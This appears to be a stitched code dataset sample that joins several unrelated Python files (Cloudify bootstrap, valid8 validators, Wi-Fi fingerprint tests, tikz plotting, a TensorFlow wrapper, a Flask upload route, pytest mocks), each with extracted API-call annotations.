bootstrap_context = outputs['cloudify']['value']
agent_key_path = bootstrap_context['cloudify_agent'][
'agent_key_path'][0]
bootstrap_context['cloudify_agent'][
'agent_key_path'] = agent_key_path
provider_context['cloudify'] = bootstrap_context
management_endpoint = outputs['management_endpoint']['value'][0]
rest = CloudifyClient(management_endpoint['manager_ip'])
rest.manager.create_context(provider['name'],
provider_context)
| [
"argparse.ArgumentParser",
"cloudify.workflows.local.FileStorage",
"cloudify.workflows.local.load_env",
"cloudify.workflows.local.init_env",
"cloudify_rest_client.CloudifyClient"
] | [((792, 817), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (815, 817), False, 'import argparse\n'), ((1276, 1311), 'cloudify.workflows.local.FileStorage', 'local.FileStorage', (['args.storage_dir'], {}), '(args.storage_dir)\n', (1293, 1311), False, 'from cloudify.workflows import local\n'), ((1365, 1428), 'cloudify.workflows.local.init_env', 'local.init_env', (['args.blueprint_path'], {'name': 'name', 'storage': 'storage'}), '(args.blueprint_path, name=name, storage=storage)\n', (1379, 1428), False, 'from cloudify.workflows import local\n'), ((1453, 1495), 'cloudify.workflows.local.load_env', 'local.load_env', ([], {'name': 'name', 'storage': 'storage'}), '(name=name, storage=storage)\n', (1467, 1495), False, 'from cloudify.workflows import local\n'), ((2264, 2313), 'cloudify_rest_client.CloudifyClient', 'CloudifyClient', (["management_endpoint['manager_ip']"], {}), "(management_endpoint['manager_ip'])\n", (2278, 2313), False, 'from cloudify_rest_client import CloudifyClient\n')] |
import sys
def inline_validate_1(s):
from valid8 import validate
validate('s', s, instance_of=str, min_len=1)
validate('s', s, equals=s.lower())
def inline_validate_2(s):
from valid8 import validate
validate('s', s, instance_of=str, min_len=1, custom=str.islower)
def inline_validate_3(s):
from valid8 import validate
# we create a custom mini_lambda variable, since the name 's' is already used
from mini_lambda import InputVar
txt = InputVar('txt', str)
validate('s', s, instance_of=str, min_len=1, custom=txt.islower())
def with_validator(s):
from valid8 import validator
with validator('s', s, instance_of=str) as v:
v.alid = (len(s) > 0) and s.islower()
def function_input_builtin_stdlib(value):
from valid8 import validate_arg
from valid8.validation_lib import instance_of, minlen
@validate_arg('s', instance_of(str), minlen(1), str.islower)
def my_function(s):
pass
my_function(value)
def function_input_mini_lambda(value):
from mini_lambda import s, Len
from valid8 import validate_arg
from valid8.validation_lib import instance_of
@validate_arg('s', instance_of(str), Len(s) > 0, s.islower())
def my_function(s):
pass
my_function(value)
def class_field_builtin_stdlib(value):
from valid8 import validate_field
from valid8.validation_lib import instance_of, minlen
@validate_field('s', instance_of(str), minlen(1), str.islower)
class Foo:
def __init__(self, s):
self.s = s
Foo(value)
def class_field_mini_lambda(value):
from mini_lambda import s, Len
from valid8 import validate_field
from valid8.validation_lib import instance_of
@validate_field('s', instance_of(str), Len(s) > 0, s.islower())
class Foo:
def __init__(self, s):
self.s = s
Foo(value)
if sys.version_info >= (3, 0):
from ._tests_pep484 import ex2_pep484 as pep484
| [
"valid8.validator",
"valid8.validate",
"mini_lambda.s.islower",
"valid8.validation_lib.minlen",
"mini_lambda.s.lower",
"mini_lambda.Len",
"valid8.validation_lib.instance_of",
"mini_lambda.InputVar"
] | [((75, 119), 'valid8.validate', 'validate', (['"""s"""', 's'], {'instance_of': 'str', 'min_len': '(1)'}), "('s', s, instance_of=str, min_len=1)\n", (83, 119), False, 'from valid8 import validate\n'), ((223, 287), 'valid8.validate', 'validate', (['"""s"""', 's'], {'instance_of': 'str', 'min_len': '(1)', 'custom': 'str.islower'}), "('s', s, instance_of=str, min_len=1, custom=str.islower)\n", (231, 287), False, 'from valid8 import validate\n'), ((478, 498), 'mini_lambda.InputVar', 'InputVar', (['"""txt"""', 'str'], {}), "('txt', str)\n", (486, 498), False, 'from mini_lambda import InputVar\n'), ((637, 671), 'valid8.validator', 'validator', (['"""s"""', 's'], {'instance_of': 'str'}), "('s', s, instance_of=str)\n", (646, 671), False, 'from valid8 import validator\n'), ((886, 902), 'valid8.validation_lib.instance_of', 'instance_of', (['str'], {}), '(str)\n', (897, 902), False, 'from valid8.validation_lib import instance_of\n'), ((904, 913), 'valid8.validation_lib.minlen', 'minlen', (['(1)'], {}), '(1)\n', (910, 913), False, 'from valid8.validation_lib import instance_of, minlen\n'), ((1175, 1191), 'valid8.validation_lib.instance_of', 'instance_of', (['str'], {}), '(str)\n', (1186, 1191), False, 'from valid8.validation_lib import instance_of\n'), ((1205, 1216), 'mini_lambda.s.islower', 's.islower', ([], {}), '()\n', (1214, 1216), False, 'from mini_lambda import s, Len\n'), ((1442, 1458), 'valid8.validation_lib.instance_of', 'instance_of', (['str'], {}), '(str)\n', (1453, 1458), False, 'from valid8.validation_lib import instance_of\n'), ((1460, 1469), 'valid8.validation_lib.minlen', 'minlen', (['(1)'], {}), '(1)\n', (1466, 1469), False, 'from valid8.validation_lib import instance_of, minlen\n'), ((1756, 1772), 'valid8.validation_lib.instance_of', 'instance_of', (['str'], {}), '(str)\n', (1767, 1772), False, 'from valid8.validation_lib import instance_of\n'), ((1786, 1797), 'mini_lambda.s.islower', 's.islower', ([], {}), '()\n', (1795, 1797), False, 'from mini_lambda import s, Len\n'), ((148, 157), 'mini_lambda.s.lower', 's.lower', ([], {}), '()\n', (155, 157), False, 'from mini_lambda import s, Len\n'), ((712, 723), 'mini_lambda.s.islower', 's.islower', ([], {}), '()\n', (721, 723), False, 'from mini_lambda import s, Len\n'), ((1193, 1199), 'mini_lambda.Len', 'Len', (['s'], {}), '(s)\n', (1196, 1199), False, 'from mini_lambda import s, Len\n'), ((1774, 1780), 'mini_lambda.Len', 'Len', (['s'], {}), '(s)\n', (1777, 1780), False, 'from mini_lambda import s, Len\n')] |
import os
import pandas as pd
import data
import make_fingerprint as mf
def test_load_logfile():
# given
trace_file_name = "test/data/filtering_test.txt"
#must_include_head = ["POSI;", "WIFI;", "MAGN;"]
must_include_head = ["POSI;", "WIFI;"]
# when
filtered_lines = mf.load_logfile(trace_file_name, must_include_head)
# then
assert "ACCE;" not in filtered_lines[:100]
assert len(filtered_lines) == 4
def test_bind_wifi_fingerprints():
# given
trace_file_name = "test/data/wifi_calibration.txt"
must_include_head = ["POSI;", "WIFI;"]
filtered_lines = mf.load_logfile(trace_file_name, must_include_head)
# when
fps, _ = mf.bind_wifi_fingerprints(filtered_lines)
# then
assert len(fps[0].wifi_dict) == 2
assert fps[0].timestamp == 61.472
assert fps[0].last_landmark == 1
assert len(fps[1].wifi_dict) == 3
assert fps[1].timestamp == 68.396
assert fps[1].last_landmark == 1
assert len(fps[2].wifi_dict) == 4
assert fps[2].timestamp == 115.986
assert fps[2].last_landmark == 2
assert len(fps) == 3
def test_fill_latitude_longitude():
# given
posis = data.load_from_json_file(
"test/data/test_posis.json", data.POSI
)
assert len(posis) == 4
fps = data.load_from_json_file(
"test/data/test_fps.json", data.WifiFingerprint
)
assert len(fps) == 50
assert fps[0].latitude is None
assert fps[0].longitude is None
# when
fps_new = mf.fill_latitude_longitude(fps, posis)
# then
assert fps_new[0].latitude is not None
assert fps_new[0].longitude is not None
def test_save_fingerprint_as_csv():
# given
posis = data.load_from_json_file(
"test/data/test_posis.json", data.POSI
)
assert len(posis) == 4
fps = data.load_from_json_file(
"test/data/test_fps.json", data.WifiFingerprint
)
assert len(fps) == 50
fps = mf.fill_latitude_longitude(fps, posis)
assert fps[0].latitude is not None
assert fps[0].longitude is not None
assert fps[0].region is None
assert len(fps[0].wifi_dict.keys()) == 34
assert str(list(fps[0].wifi_dict.values())[0]) == "WIFI(timestamp=64.373, sensor_timestamp=12313.167, ssid_name='SSID_0012', mac='20:19:00:00:00:53', freq=2412, rssi=-32)"
fps = mf.bucketization(fps)
assert fps[0].region is not None
test_csv_file_name = "test.csv"
if os.path.isfile(test_csv_file_name):
os.remove(test_csv_file_name)
assert os.path.isfile(test_csv_file_name) is False
# when
data.save_fingerprint_as_csv(test_csv_file_name, fps)
# then
assert os.path.isfile(test_csv_file_name) is True
df = pd.read_csv(test_csv_file_name)
os.remove(test_csv_file_name) | [
"make_fingerprint.load_logfile",
"make_fingerprint.fill_latitude_longitude",
"make_fingerprint.bind_wifi_fingerprints",
"data.load_from_json_file",
"pandas.read_csv",
"os.path.isfile",
"data.save_fingerprint_as_csv",
"make_fingerprint.bucketization",
"os.remove"
] | [((293, 344), 'make_fingerprint.load_logfile', 'mf.load_logfile', (['trace_file_name', 'must_include_head'], {}), '(trace_file_name, must_include_head)\n', (308, 344), True, 'import make_fingerprint as mf\n'), ((613, 664), 'make_fingerprint.load_logfile', 'mf.load_logfile', (['trace_file_name', 'must_include_head'], {}), '(trace_file_name, must_include_head)\n', (628, 664), True, 'import make_fingerprint as mf\n'), ((690, 731), 'make_fingerprint.bind_wifi_fingerprints', 'mf.bind_wifi_fingerprints', (['filtered_lines'], {}), '(filtered_lines)\n', (715, 731), True, 'import make_fingerprint as mf\n'), ((1177, 1241), 'data.load_from_json_file', 'data.load_from_json_file', (['"""test/data/test_posis.json"""', 'data.POSI'], {}), "('test/data/test_posis.json', data.POSI)\n", (1201, 1241), False, 'import data\n'), ((1294, 1367), 'data.load_from_json_file', 'data.load_from_json_file', (['"""test/data/test_fps.json"""', 'data.WifiFingerprint'], {}), "('test/data/test_fps.json', data.WifiFingerprint)\n", (1318, 1367), False, 'import data\n'), ((1506, 1544), 'make_fingerprint.fill_latitude_longitude', 'mf.fill_latitude_longitude', (['fps', 'posis'], {}), '(fps, posis)\n', (1532, 1544), True, 'import make_fingerprint as mf\n'), ((1707, 1771), 'data.load_from_json_file', 'data.load_from_json_file', (['"""test/data/test_posis.json"""', 'data.POSI'], {}), "('test/data/test_posis.json', data.POSI)\n", (1731, 1771), False, 'import data\n'), ((1824, 1897), 'data.load_from_json_file', 'data.load_from_json_file', (['"""test/data/test_fps.json"""', 'data.WifiFingerprint'], {}), "('test/data/test_fps.json', data.WifiFingerprint)\n", (1848, 1897), False, 'import data\n'), ((1948, 1986), 'make_fingerprint.fill_latitude_longitude', 'mf.fill_latitude_longitude', (['fps', 'posis'], {}), '(fps, posis)\n', (1974, 1986), True, 'import make_fingerprint as mf\n'), ((2333, 2354), 'make_fingerprint.bucketization', 'mf.bucketization', (['fps'], {}), '(fps)\n', (2349, 2354), True, 'import make_fingerprint as mf\n'), ((2436, 2470), 'os.path.isfile', 'os.path.isfile', (['test_csv_file_name'], {}), '(test_csv_file_name)\n', (2450, 2470), False, 'import os\n'), ((2586, 2639), 'data.save_fingerprint_as_csv', 'data.save_fingerprint_as_csv', (['test_csv_file_name', 'fps'], {}), '(test_csv_file_name, fps)\n', (2614, 2639), False, 'import data\n'), ((2720, 2751), 'pandas.read_csv', 'pd.read_csv', (['test_csv_file_name'], {}), '(test_csv_file_name)\n', (2731, 2751), True, 'import pandas as pd\n'), ((2761, 2790), 'os.remove', 'os.remove', (['test_csv_file_name'], {}), '(test_csv_file_name)\n', (2770, 2790), False, 'import os\n'), ((2480, 2509), 'os.remove', 'os.remove', (['test_csv_file_name'], {}), '(test_csv_file_name)\n', (2489, 2509), False, 'import os\n'), ((2521, 2555), 'os.path.isfile', 'os.path.isfile', (['test_csv_file_name'], {}), '(test_csv_file_name)\n', (2535, 2555), False, 'import os\n'), ((2667, 2701), 'os.path.isfile', 'os.path.isfile', (['test_csv_file_name'], {}), '(test_csv_file_name)\n', (2681, 2701), False, 'import os\n')] |
from __future__ import print_function
import tikzplots as tkz
import argparse
import numpy as np
import re
def parse_data_file(fname):
with open(fname, 'r') as fp:
lines = fp.readlines()
# Read in the first line, and find the comma-separated values
# in the header
hline = lines[0]
for index, h in enumerate(hline):
if h == '=':
hstr = hline[index+1:].split(',')
# Strip away any white space
header = []
for h in hstr:
header.append(h.strip())
data = []
for line in lines[1:]:
dline = []
for entry in line.split():
dline.append(float(entry))
data.append(dline)
return header, np.array(data)
# Create an argument parser to read in arguments from the commnad line
p = argparse.ArgumentParser()
p.add_argument('--files', nargs='+', type=str, help='List of files')
p.add_argument('--labels', nargs='+', type=str, help='List of labels')
p.add_argument('--outfile', type=str, default='output.tex')
p.add_argument('--plot', type=str, default='effectivity')
args = p.parse_args()
# Set the colors to use for each set of bars
colors = []
for i in range(10):
colors.append('tableau%d'%(i))
tikzcolors = '''
\definecolor{tableau0}{RGB}{31,119,180}
\definecolor{tableau1}{RGB}{255,158,74}
\definecolor{tableau2}{RGB}{103,191,92}
\definecolor{tableau3}{RGB}{237,102,93}
\definecolor{tableau4}{RGB}{148,103,189}
\definecolor{tableau5}{RGB}{168,120,110}
\definecolor{tableau6}{RGB}{237,151,202}
\definecolor{tableau7}{RGB}{162,162,162}
\definecolor{tableau8}{RGB}{205,204,93}
\definecolor{tableau9}{RGB}{109,204,218}
'''
data = []
for fname in args.files:
try:
header, dat = parse_data_file(fname)
except:
print('fname = ', fname)
data.append(dat)
# Plot the error on the y-axis
nnodes_index = header.index('nnodes')
fval_eff_index = header.index('fval_effectivity')
indc_eff_index = header.index('indicator_effectivity')
# Find the max value of y
xmin = 1e20
xmax = 0
ymin = 0
ymax = 0
# Look through all the data
for d in data:
xmin = min(xmin, np.min(d[:, nnodes_index]))
xmax = max(xmax, np.max(d[:, nnodes_index]))
if args.plot == 'effectivity':
ymax = max(ymax, np.max(d[:, fval_eff_index]))
ymax = min(ymax, 100)
else:
ymax = max(ymax, np.max(d[:, indc_eff_index]))
ymax = min(ymax, 500)
# Round to the nearest multiple of 10
xmin = int(np.floor(np.log10(xmin)))
xmax = int(np.ceil(np.log10(xmax)))
# Create a range
xticks = np.linspace(xmin, xmax, xmax - xmin + 1)
xtick_labels = []
for exp in range(xmin, xmax + 1, 1):
xtick_labels.append('$10^{%d}$'%(exp))
# Set the positions of the tick locations
if ymax < 2.0:
ymax_int = int(np.ceil(4.0*ymax))
ymax = ymax_int/4.0
yticks = np.linspace(0, ymax, ymax_int+1)
ytick_labels = yticks
elif ymax < 10:
ymax = int(np.ceil(ymax))
yticks = np.linspace(0, ymax, ymax+1)
ytick_labels = range(ymax+1)
elif ymax < 20:
ymax = 2*int(np.ceil(ymax/2.0))
yticks = np.linspace(0, ymax, ymax+1)
ytick_labels = range(0, ymax+1, 2)
yticks = np.linspace(0, ymax, ymax/2 + 1)
else:
ymax = 5*int(np.ceil(ymax/5.0))
yticks = np.linspace(0, ymax, ymax+1)
ytick_labels = range(0, ymax+1, 5)
yticks = np.linspace(0, ymax, ymax/5 + 1)
# The overall dimensions
xdim = 2.0
xscale = xdim/(xmax - xmin)
ydim = 1.75
yscale = ydim/(ymax - ymin)
# Get the header info
s = tkz.get_header()
s += tkz.get_begin_tikz(xdim=1.5, ydim=1.5, xunit='in', yunit='in')
s += tikzcolors
symbols = ['circle', 'square', 'triangle', 'delta', 'diamond']
for k, d in enumerate(data):
xvals = np.log10(d[:, nnodes_index])
if args.plot == 'effectivity':
yvals = d[:, fval_eff_index]
else:
yvals = d[:, indc_eff_index]
s += tkz.get_2d_plot(xvals, yvals,
line_dim='very thick',
color=colors[k % 10],
symbol=symbols[k % 4],
symbol_size=0.035,
xscale=xscale, yscale=yscale,
xmin=xmin, xmax=xmax,
ymin=ymin, ymax=ymax)
# Set the labels (lower-right corner)
if args.labels is not None:
for k, label in enumerate(args.labels):
x = xmin + 0.75*(xmax - xmin)
y = ymin + 0.05*(ymax - ymin)*(len(args.labels)-k)
length = 0.035*(xmax - xmin)
s += tkz.get_legend_entry(x, y, length, label=label,
font_size='small',
line_dim='very thick',
color=colors[k % 10], symbol=symbols[k % 4],
symbol_size=0.035,
xscale=xscale, yscale=yscale)
if args.plot == 'effectivity':
title = 'Effectivity'
else:
title = 'Indicator effectivity'
# Plot the axes
s += tkz.get_2d_axes(xmin, xmax, ymin, ymax,
xscale=xscale, yscale=yscale,
xticks=xticks, yticks=yticks,
xtick_labels=xtick_labels,
ytick_labels=ytick_labels,
tick_font='normalsize',
tick_frac=0.01,
xlabel_offset=0.085,
label_font='Large',
xlabel='Number of nodes',
ylabel_offset=0.175,
ylabel=title)
s += tkz.get_end_tikz()
fp = open(args.outfile, 'w')
fp.write(s)
fp.close()
| [
"numpy.ceil",
"numpy.log10",
"tikzplots.get_legend_entry",
"argparse.ArgumentParser",
"tikzplots.get_2d_plot",
"numpy.max",
"tikzplots.get_2d_axes",
"numpy.array",
"numpy.linspace",
"tikzplots.get_end_tikz",
"tikzplots.get_begin_tikz",
"numpy.min",
"tikzplots.get_header"
] | [((861, 886), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (884, 886), False, 'import argparse\n'), ((2602, 2642), 'numpy.linspace', 'np.linspace', (['xmin', 'xmax', '(xmax - xmin + 1)'], {}), '(xmin, xmax, xmax - xmin + 1)\n', (2613, 2642), True, 'import numpy as np\n'), ((3535, 3551), 'tikzplots.get_header', 'tkz.get_header', ([], {}), '()\n', (3549, 3551), True, 'import tikzplots as tkz\n'), ((3557, 3619), 'tikzplots.get_begin_tikz', 'tkz.get_begin_tikz', ([], {'xdim': '(1.5)', 'ydim': '(1.5)', 'xunit': '"""in"""', 'yunit': '"""in"""'}), "(xdim=1.5, ydim=1.5, xunit='in', yunit='in')\n", (3575, 3619), True, 'import tikzplots as tkz\n'), ((5010, 5324), 'tikzplots.get_2d_axes', 'tkz.get_2d_axes', (['xmin', 'xmax', 'ymin', 'ymax'], {'xscale': 'xscale', 'yscale': 'yscale', 'xticks': 'xticks', 'yticks': 'yticks', 'xtick_labels': 'xtick_labels', 'ytick_labels': 'ytick_labels', 'tick_font': '"""normalsize"""', 'tick_frac': '(0.01)', 'xlabel_offset': '(0.085)', 'label_font': '"""Large"""', 'xlabel': '"""Number of nodes"""', 'ylabel_offset': '(0.175)', 'ylabel': 'title'}), "(xmin, xmax, ymin, ymax, xscale=xscale, yscale=yscale,\n xticks=xticks, yticks=yticks, xtick_labels=xtick_labels, ytick_labels=\n ytick_labels, tick_font='normalsize', tick_frac=0.01, xlabel_offset=\n 0.085, label_font='Large', xlabel='Number of nodes', ylabel_offset=\n 0.175, ylabel=title)\n", (5025, 5324), True, 'import tikzplots as tkz\n'), ((5543, 5561), 'tikzplots.get_end_tikz', 'tkz.get_end_tikz', ([], {}), '()\n', (5559, 5561), True, 'import tikzplots as tkz\n'), ((2874, 2908), 'numpy.linspace', 'np.linspace', (['(0)', 'ymax', '(ymax_int + 1)'], {}), '(0, ymax, ymax_int + 1)\n', (2885, 2908), True, 'import numpy as np\n'), ((3743, 3771), 'numpy.log10', 'np.log10', (['d[:, nnodes_index]'], {}), '(d[:, nnodes_index])\n', (3751, 3771), True, 'import numpy as np\n'), ((3901, 4099), 'tikzplots.get_2d_plot', 'tkz.get_2d_plot', (['xvals', 'yvals'], {'line_dim': '"""very thick"""', 'color': 'colors[k % 10]', 'symbol': 'symbols[k % 4]', 'symbol_size': '(0.035)', 'xscale': 'xscale', 'yscale': 'yscale', 'xmin': 'xmin', 'xmax': 'xmax', 'ymin': 'ymin', 'ymax': 'ymax'}), "(xvals, yvals, line_dim='very thick', color=colors[k % 10],\n symbol=symbols[k % 4], symbol_size=0.035, xscale=xscale, yscale=yscale,\n xmin=xmin, xmax=xmax, ymin=ymin, ymax=ymax)\n", (3916, 4099), True, 'import tikzplots as tkz\n'), ((2170, 2196), 'numpy.min', 'np.min', (['d[:, nnodes_index]'], {}), '(d[:, nnodes_index])\n', (2176, 2196), True, 'import numpy as np\n'), ((2219, 2245), 'numpy.max', 'np.max', (['d[:, nnodes_index]'], {}), '(d[:, nnodes_index])\n', (2225, 2245), True, 'import numpy as np\n'), ((2522, 2536), 'numpy.log10', 'np.log10', (['xmin'], {}), '(xmin)\n', (2530, 2536), True, 'import numpy as np\n'), ((2558, 2572), 'numpy.log10', 'np.log10', (['xmax'], {}), '(xmax)\n', (2566, 2572), True, 'import numpy as np\n'), ((2818, 2837), 'numpy.ceil', 'np.ceil', (['(4.0 * ymax)'], {}), '(4.0 * ymax)\n', (2825, 2837), True, 'import numpy as np\n'), ((2992, 3022), 'numpy.linspace', 'np.linspace', (['(0)', 'ymax', '(ymax + 1)'], {}), '(0, ymax, ymax + 1)\n', (3003, 3022), True, 'import numpy as np\n'), ((4526, 4719), 'tikzplots.get_legend_entry', 'tkz.get_legend_entry', (['x', 'y', 'length'], {'label': 'label', 'font_size': '"""small"""', 'line_dim': '"""very thick"""', 'color': 'colors[k % 10]', 'symbol': 'symbols[k % 4]', 'symbol_size': '(0.035)', 'xscale': 'xscale', 'yscale': 'yscale'}), "(x, y, length, label=label, font_size='small', line_dim\n ='very thick', color=colors[k % 10], symbol=symbols[k % 4], symbol_size\n =0.035, xscale=xscale, yscale=yscale)\n", (4546, 4719), True, 'import tikzplots as tkz\n'), ((770, 784), 'numpy.array', 'np.array', (['data'], {}), '(data)\n', (778, 784), True, 'import numpy as np\n'), ((2308, 2336), 'numpy.max', 'np.max', (['d[:, fval_eff_index]'], {}), '(d[:, fval_eff_index])\n', (2314, 2336), True, 'import numpy as np\n'), ((2403, 2431), 'numpy.max', 'np.max', (['d[:, indc_eff_index]'], {}), '(d[:, indc_eff_index])\n', (2409, 2431), True, 'import numpy as np\n'), ((2964, 2977), 'numpy.ceil', 'np.ceil', (['ymax'], {}), '(ymax)\n', (2971, 2977), True, 'import numpy as np\n'), ((3119, 3149), 'numpy.linspace', 'np.linspace', (['(0)', 'ymax', '(ymax + 1)'], {}), '(0, ymax, ymax + 1)\n', (3130, 3149), True, 'import numpy as np\n'), ((3200, 3234), 'numpy.linspace', 'np.linspace', (['(0)', 'ymax', '(ymax / 2 + 1)'], {}), '(0, ymax, ymax / 2 + 1)\n', (3211, 3234), True, 'import numpy as np\n'), ((3288, 3318), 'numpy.linspace', 'np.linspace', (['(0)', 'ymax', '(ymax + 1)'], {}), '(0, ymax, ymax + 1)\n', (3299, 3318), True, 'import numpy as np\n'), ((3369, 3403), 'numpy.linspace', 'np.linspace', (['(0)', 'ymax', '(ymax / 5 + 1)'], {}), '(0, ymax, ymax / 5 + 1)\n', (3380, 3403), True, 'import numpy as np\n'), ((3087, 3106), 'numpy.ceil', 'np.ceil', (['(ymax / 2.0)'], {}), '(ymax / 2.0)\n', (3094, 3106), True, 'import numpy as np\n'), ((3256, 3275), 'numpy.ceil', 'np.ceil', (['(ymax / 5.0)'], {}), '(ymax / 5.0)\n', (3263, 3275), True, 'import numpy as np\n')] |
import tensorflow as tf
import numpy as np
import os
class TFModel(object):
'''
This class contains the general functions for a tensorflow model
'''
def __init__(self, config):
# Limit the TensorFlow's logs
#os.environ['TF_CPP_MIN_LOG_LEVEL'] = '4'
# tf.logging.set_verbosity(tf.logging.ERROR)
self.config = config
self.sess = None
self.saver = None
def initialize_session(self):
"""
Set configurations:
* allow_soft_placement : If True, will allow models trained
on GPU to be deployed unto CPU
* log_device_placement : If True, will print the hardware
and operations that have been placed on it
"""
sess_conf = tf.ConfigProto(allow_soft_placement=True,
log_device_placement=False)
sess_conf.gpu_options.allow_growth = True
self.sess = tf.Session(config=sess_conf)
# Save object
if not self.config.save == None:
self.saver = tf.train.Saver()
# Initialize all variables
self.sess.run(tf.global_variables_initializer())
def save_model(self, fold, timestamp, name):
"""
Save the model and the config file
"""
model_name = name + "_" + timestamp
main_dir = "./checkpoints/" + model_name + "/"
# Check main model dir
if not os.path.exists(main_dir):
os.makedirs(main_dir)
# If using K-Fold Cross Validation, save each model
if self.config.k_folds > 1:
dir = main_dir + "Fold_" + str(fold + 1) + "/"
# Create Fold dir
if not os.path.exists(dir):
os.makedirs(dir)
# Save the model
self.saver.save(self.sess, dir)
else:
self.saver.save(self.sess, main_dir)
return main_dir
def ner_save(self, fold, timestamp, name, ep):
# Save the model
main_dir = self.save_model(fold, timestamp, name)
# Save the corresponding config file
if fold == 0:
np.savez(main_dir + "config",
model=self.config.model,
k_folds=self.config.k_folds,
words=self.config.words,
tags=self.config.tags,
chars=self.config.chars,
use_crf=self.config.use_crf,
epoch=ep+1)
def class_save(self, fold, timestamp, name, ep):
# Save the model
main_dir = self.save_model(fold, timestamp, name)
# Save the config file
if fold == 0:
np.savez(main_dir + "config",
model=self.config.model,
k_folds=self.config.k_folds,
words=self.config.words,
chars=self.config.chars,
epoch=ep+1)
def close_session(self):
self.sess.close()
tf.reset_default_graph()
| [
"os.path.exists",
"numpy.savez",
"tensorflow.reset_default_graph",
"os.makedirs",
"tensorflow.Session",
"tensorflow.train.Saver",
"tensorflow.global_variables_initializer",
"tensorflow.ConfigProto"
] | [((847, 916), 'tensorflow.ConfigProto', 'tf.ConfigProto', ([], {'allow_soft_placement': '(True)', 'log_device_placement': '(False)'}), '(allow_soft_placement=True, log_device_placement=False)\n', (861, 916), True, 'import tensorflow as tf\n'), ((1022, 1050), 'tensorflow.Session', 'tf.Session', ([], {'config': 'sess_conf'}), '(config=sess_conf)\n', (1032, 1050), True, 'import tensorflow as tf\n'), ((3074, 3098), 'tensorflow.reset_default_graph', 'tf.reset_default_graph', ([], {}), '()\n', (3096, 3098), True, 'import tensorflow as tf\n'), ((1140, 1156), 'tensorflow.train.Saver', 'tf.train.Saver', ([], {}), '()\n', (1154, 1156), True, 'import tensorflow as tf\n'), ((1215, 1248), 'tensorflow.global_variables_initializer', 'tf.global_variables_initializer', ([], {}), '()\n', (1246, 1248), True, 'import tensorflow as tf\n'), ((1517, 1541), 'os.path.exists', 'os.path.exists', (['main_dir'], {}), '(main_dir)\n', (1531, 1541), False, 'import os\n'), ((1555, 1576), 'os.makedirs', 'os.makedirs', (['main_dir'], {}), '(main_dir)\n', (1566, 1576), False, 'import os\n'), ((2212, 2421), 'numpy.savez', 'np.savez', (["(main_dir + 'config')"], {'model': 'self.config.model', 'k_folds': 'self.config.k_folds', 'words': 'self.config.words', 'tags': 'self.config.tags', 'chars': 'self.config.chars', 'use_crf': 'self.config.use_crf', 'epoch': '(ep + 1)'}), "(main_dir + 'config', model=self.config.model, k_folds=self.config.\n k_folds, words=self.config.words, tags=self.config.tags, chars=self.\n config.chars, use_crf=self.config.use_crf, epoch=ep + 1)\n", (2220, 2421), True, 'import numpy as np\n'), ((2759, 2911), 'numpy.savez', 'np.savez', (["(main_dir + 'config')"], {'model': 'self.config.model', 'k_folds': 'self.config.k_folds', 'words': 'self.config.words', 'chars': 'self.config.chars', 'epoch': '(ep + 1)'}), "(main_dir + 'config', model=self.config.model, k_folds=self.config.\n k_folds, words=self.config.words, chars=self.config.chars, epoch=ep + 1)\n", (2767, 2911), True, 'import numpy as np\n'), ((1782, 1801), 'os.path.exists', 'os.path.exists', (['dir'], {}), '(dir)\n', (1796, 1801), False, 'import os\n'), ((1819, 1835), 'os.makedirs', 'os.makedirs', (['dir'], {}), '(dir)\n', (1830, 1835), False, 'import os\n')] |
from flask import Flask, request, jsonify
app = Flask(__name__)
@app.route('/upload', methods=['POST'])
def index():
image_files = request.files.getlist('image')
video_files = request.files.getlist('video')
if not image_files and not video_files:
return jsonify({
"code": -1,
"message": "No upload images or videos."
})
for image_file in image_files:
image_file.save(image_file.filename)
for video_file in video_files:
video_file.save(video_file.filename)
return jsonify({
"code": 0,
"message": "upload images and videos success."
})
if __name__ == '__main__':
app.run('0.0.0.0', debug=True, port=5000)
| [
"flask.jsonify",
"flask.request.files.getlist",
"flask.Flask"
] | [((49, 64), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (54, 64), False, 'from flask import Flask, request, jsonify\n'), ((138, 168), 'flask.request.files.getlist', 'request.files.getlist', (['"""image"""'], {}), "('image')\n", (159, 168), False, 'from flask import Flask, request, jsonify\n'), ((187, 217), 'flask.request.files.getlist', 'request.files.getlist', (['"""video"""'], {}), "('video')\n", (208, 217), False, 'from flask import Flask, request, jsonify\n'), ((550, 618), 'flask.jsonify', 'jsonify', (["{'code': 0, 'message': 'upload images and videos success.'}"], {}), "({'code': 0, 'message': 'upload images and videos success.'})\n", (557, 618), False, 'from flask import Flask, request, jsonify\n'), ((278, 341), 'flask.jsonify', 'jsonify', (["{'code': -1, 'message': 'No upload images or videos.'}"], {}), "({'code': -1, 'message': 'No upload images or videos.'})\n", (285, 341), False, 'from flask import Flask, request, jsonify\n')] |
import logging
from dataclasses import dataclass
from unittest.mock import patch
import pytest
from tests.utils.mock_backend import (
ApiKey,
BackendContext,
Run,
Project,
Team,
User,
)
from tests.utils.mock_base_client import MockBaseClient
########################################
########### BackendContext #############
########################################
@dataclass
class DefaultData:
user: User
api_key: ApiKey
team: Team
project: Project
run: Run
@pytest.fixture(scope="session")
def default_data() -> DefaultData:
user = User()
api_key = ApiKey(user.Id)
team = Team(user.Id, isPersonal=True)
project = Project(team.Id)
run = Run(userId=user.Id, teamId=team.Id, projectId=project.Id)
return DefaultData(user=user, api_key=api_key, team=team, project=project, run=run)
@pytest.fixture(scope="function", autouse=True)
def patch_ctx(default_data: DefaultData):
logging.info("Patching tests.utils.mock_backend.ctx to have default values")
ctx = BackendContext()
for (k, v) in default_data.__dict__.items():
ctx.set(k, v)
with patch("tests.utils.mock_backend.ctx", ctx):
logging.info("Successfully patched tests.utils.mock_backend.ctx")
yield
logging.info("unpatching tests.utils.mock_backend.ctx back to fresh state")
@pytest.fixture(scope="session", autouse=True)
def patch_base_client():
with patch("manta_lab.api.client._BaseClient", MockBaseClient):
logging.info("Successfully patched manta_lab.api.client_BaseClient with MockBaseClient")
yield
logging.info("unpatching manta_lab.api.client_BaseClient")
# @pytest.fixture()
# def run(request):
# marker = request.node.get_closest_marker("manta_args")
# kwargs = marker.kwargs if marker else dict(env={})
# for k, v in kwargs["env"].items():
# os.environ[k] = v
# # TODO: should be create run by manta.init
# s = Settings()
# s.update_envs(kwargs["env"])
# return Run(settings=s)
| [
"tests.utils.mock_backend.Team",
"tests.utils.mock_backend.User",
"logging.info",
"tests.utils.mock_backend.Project",
